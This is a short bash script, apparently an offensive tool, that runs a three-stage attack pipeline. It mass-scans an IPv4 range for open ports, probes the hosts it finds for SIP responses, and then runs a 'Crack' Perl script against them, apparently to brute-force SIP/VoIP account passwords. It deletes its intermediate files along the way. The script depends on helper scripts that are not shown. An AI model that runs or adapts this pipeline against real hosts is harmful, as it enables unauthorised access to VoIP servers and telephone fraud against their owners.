#!/bin/bash

# Scan IPv4 range on ports
echo -e "\nStart scanning ...\n"

bash go
sleep 1
grep -Po "(\d+\.){3}\d+:?(\d?){6}" IPSx >>IPS
rm IPSx # remove the file
sleep 1

echo -e "\nEnding scanning port !\n"

# SIP Responses

echo -e "\nStart SIP Responses ...\n"

perl run IPS
cat 403.pal 404.pal >> ipSIP
rm IPS # remove the file IPS
sleep 2

echo -e "\nEnding Responses !\n"

# SIP Crack

echo -e "\nStart SIP Crack ...\n"

perl Crack 250 2 ipSIP
rm ipSIP # remove the file ipSIP
rm *.pal # remove the file

sleep 2

echo -e "\nEnding crack !\n"
echo -e "\nby Mohammad Elnwajha\n"
